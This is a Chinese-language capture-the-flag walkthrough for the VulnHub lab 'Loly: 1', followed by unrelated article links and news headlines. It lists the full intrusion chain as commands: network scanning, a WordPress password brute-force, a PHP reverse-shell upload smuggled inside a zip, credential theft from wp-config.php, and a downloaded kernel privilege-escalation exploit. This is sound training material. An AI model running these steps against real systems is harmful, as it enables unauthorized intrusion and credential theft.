当前位置: 首页 > news >正文

Loly: 1靶场渗透

Loly: 1

来自 <Loly: 1 ~ VulnHub>

 

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.241

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.241

访问80端口的http服务

扫描网站子目录

dirsearch -u http://192.168.23.241 -x 403,404

 

4,扫描出来了wordpress的网页,访问看看

加载缓慢,修改/etc/hosts文件试试

echo "192.168.23.241 loly.lc" >>/etc/hosts

访问 http://loly.lc/wordpress/ 的速度果然变快了

登录网站如下 http://loly.lc/wordpress/wp-login.php

 

5,对网站进行指纹识别扫描

whatweb -v http://loly.lc/wordpress/

 

6,然后再尝试使用wpscan进行扫描爆破用户名

gunzip /usr/share/wordlists/rockyou.txt.gz

成功爆破出账户密码loly/fernando

 

7,使用账户密码进行登录,登录成功

然后寻找webshell的上传点

http://loly.lc/wordpress/wp-admin/admin.php?page=adrotate-media

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

上传失败

先上传zip文件,访问的时候以php后缀名访问

mv php-reverse-shell.php shell.php

zip -r -o shell.php.zip shell.php

再次上传,上传文件成功

然后看到文件上传的位置,由此进行一个访问触发反弹shell

http://loly.lc/wordpress/wp-content/banners/shell.php

与此同时kali打开对4444端口的监听,成功getshell

 

8,然后使用python脚本获取一个可交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

信息收集一下,一般的套路就是阅读mysql数据库配置文件,获取数据库账户密码。然后登录数据库,获取普通用户/超级用户泄露的账号密码

cat wp-config.php

得到mysql账号密码wordpress/lolyisabeautifulgirl

 

9,然后登录mysql数据库

mysql -u wordpress -p

show databases;

use  wordpress;

show tables;

select * from wp_users;

但是这个密码没什么用

 

10,发现使用这个密码可以直接切换loly用户

lolyisabeautifulgirl

uname -a

lsb_release -a

搜索内核提权漏洞

searchsploit 4.4.0-31 ubuntu Privilege

把脚本下载到当前目录下

searchsploit -m 45010.c

 

11,在kali使用python开启监听,然后靶机使用wget下载即可
python -m http.server

wget http://192.168.23.182:8000/45010.c

使用gcc编译器编译提权exp

gcc 45010.c -o exp

chmod +x exp

./exp

提权成功,成功get flag

 

 

相关文章:

  • C++ 备忘录模式详解
  • 【AWS+Wordpress-准备阶段】AWS注册+创建EC2实例
  • 基于nnom的多选择器
  • JNDI 注入原理解析
  • 五子棋html
  • Kubernetes(k8s)学习笔记(九)--搭建多租户系统
  • 深入浅出HTML:构建现代网页的基石
  • Vue:现代前端开发的基石引擎
  • ActiveMQ 源码剖析:消息存储与通信协议实现(一)
  • DeepSeek系列论文解读四之DeepSeek Prover V2
  • 应急响应靶场web2:知攻善防实验室
  • 行为树笔记
  • 记录一下spring-cloud-starter-alibaba-nacos-config 2023.0.3.2与springboot版本及配置问题
  • kettle从入门到精通 第九十六课 ETL之kettle Elasticsearch 增删改查彻底掌握
  • excel 批量导出图片并指定命名
  • FPGA 纯逻辑NVME raid0 IP核
  • 常用设计模式在 Spring Boot 项目中的实战案例
  • 当当狸智能天文望远镜 TW2 | 用科技触摸星辰,让探索触手可及
  • 第十一节:图像处理基础-图像阈值处理
  • 16.Excel:打印技巧
  • 庆祝上海总工会成立100周年暨市模范集体劳动模范和先进工作者表彰大会举行,陈吉宁寄予这些期待
  • 2025年上海市模范集体、劳动模范和先进工作者名单揭晓
  • 奥园集团将召开债券持有人会议,拟调整“H20奥园2”本息兑付方案
  • 老铺黄金拟配售募资近27亿港元,用于门店拓展扩建及补充流动资金等
  • 新华时评:任凭风云变幻,中俄关系从容前行
  • 哥伦比亚总统称将在访华期间签署“一带一路”倡议意向书,外交部回应